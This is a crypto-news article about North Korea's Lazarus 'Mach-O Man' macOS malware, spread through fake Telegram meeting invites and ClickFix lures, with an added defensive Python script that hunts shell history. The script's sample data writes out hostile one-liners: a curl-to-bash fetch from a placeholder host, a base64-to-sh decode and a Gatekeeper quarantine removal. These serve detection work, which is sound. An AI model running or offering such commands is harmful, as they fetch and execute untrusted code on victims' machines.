Lazarus Mach-O macOS malware uses fake Telegram meeting invites to steal crypto credentials
North Korea's Lazarus Group is deploying macOS malware dubbed "Mach-O Man" to target crypto and fintech executives through social engineering. The attack begins with urgent meeting invites sent over Telegram that impersonate Zoom, Microsoft Teams, or Google Meet; victims are then redirected to a fake site that uses the ClickFix technique, in which users are told to paste a terminal command to "fix" a connection issue.
Once run, the Mach-O Man toolkit installs modular Mach-O components that profile the device, set up persistence, and steal credentials and browser data. Exfiltration goes through a Telegram-based command-and-control channel. The malware deletes itself after execution, which makes incident response and forensics harder.
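As an added example (not code from the CertiK report or this article), a small Python hunt script for the ClickFix step described above: because the toolkit deletes itself after running, the one-liner the user pasted into Terminal is often one of the few artifacts left, and it usually survives in the shell history. The detection rules and the sample history lines are constructed for illustration and are not indicators from the report.

```python
import re
from typing import List, NamedTuple

class Finding(NamedTuple):
    line_no: int
    rule: str
    command: str

# Heuristic shapes of a ClickFix-style one-liner: a command the user was told to paste
# that fetches or decodes code and hands it to a shell, or disarms Gatekeeper checks.
# These are generic patterns (assumed), not indicators taken from the CertiK report.
RULES = {
    "fetch_piped_to_shell": re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "decoded_payload_to_shell": re.compile(r"base64\s+(-d|--decode|-D)\b.*\|\s*(ba|z)?sh\b"),
    "inline_applescript": re.compile(r"\bosascript\s+-e\b"),
    "quarantine_flag_removed": re.compile(r"\bxattr\b.*(-c\b|com\.apple\.quarantine)"),
}

def strip_zsh_timestamp(line: str) -> str:
    """zsh EXTENDED_HISTORY lines look like ': 1700000000:0;cmd'; keep only cmd."""
    m = re.match(r"^: \d+:\d+;(.*)$", line)
    return m.group(1) if m else line

def scan_history(lines) -> List[Finding]:
    """Return every history line that matches one of the ClickFix heuristics."""
    findings = []
    for n, raw in enumerate(lines, 1):
        cmd = strip_zsh_timestamp(raw.rstrip("\n"))
        for name, rx in RULES.items():
            if rx.search(cmd):
                findings.append(Finding(n, name, cmd))
    return findings

# Constructed sample of a ~/.zsh_history file; 'example.invalid' is a reserved placeholder host.
SAMPLE_HISTORY = [
    ": 1700000001:0;ls -la",
    ": 1700000002:0;git status",
    ": 1700000003:0;curl -fsSL https://meet-fix.example.invalid/fix.sh | bash",
    ": 1700000004:0;echo aGVsbG8K | base64 -d | sh",
    ": 1700000005:0;xattr -d com.apple.quarantine ~/Downloads/MeetingClient.app",
    ": 1700000006:0;brew update",
]

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:  # e.g. python3 hunt.py ~/.zsh_history
        with open(sys.argv[1], errors="replace") as fh:
            lines = fh.read().splitlines()
    else:
        lines = SAMPLE_HISTORY
    for f in scan_history(lines):
        print(f"line {f.line_no}: {f.rule}: {f.command}")
```

Run it against each user's `~/.zsh_history` or `~/.bash_history` on a suspect Mac; a hit only dates the paste and names the shape of the command, so follow it with the usual persistence and network review.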
CertiK attributes the campaign to Lazarus' Famous Chollima unit and says it is delivered through compromised Telegram accounts that target high-value digital-asset organizations. The report also ties Mach-O Man to a larger Lazarus theft spree, with more than $500M stolen from the DeFi platforms Drift and KelpDAO in the past two weeks.
For crypto traders, the practical takeaway is risk control: treat unexpected meeting requests, especially ones that instruct you to run terminal commands, as a high-risk Lazarus Mach-O Man social engineering attempt. Verify invites through a separate channel before clicking links or running any instructions.
Bearish
This is a Lazarus credential-stealing campaign on macOS ("Mach-O Man") that is linked to a large recent theft from the DeFi platforms Drift and KelpDAO. In the short term, reports of a major wallet or credential compromise typically raise perceived counterparty risk, increase the likelihood of further account takeovers, and can trigger liquidations or risk-off positioning around the affected ecosystems (DRIFT, KELP). Over the longer term, prolonged incident response, reputational damage, and possible disruptions to contract/exchange access could reduce new inflows and confidence in governance/treasury.
However, the malware targets specific users rather than being a protocol-level exploit that affects every holder, so the price effect is likely to be strongest for tokens directly linked to the impacted DeFi systems rather than causing broad market contagion.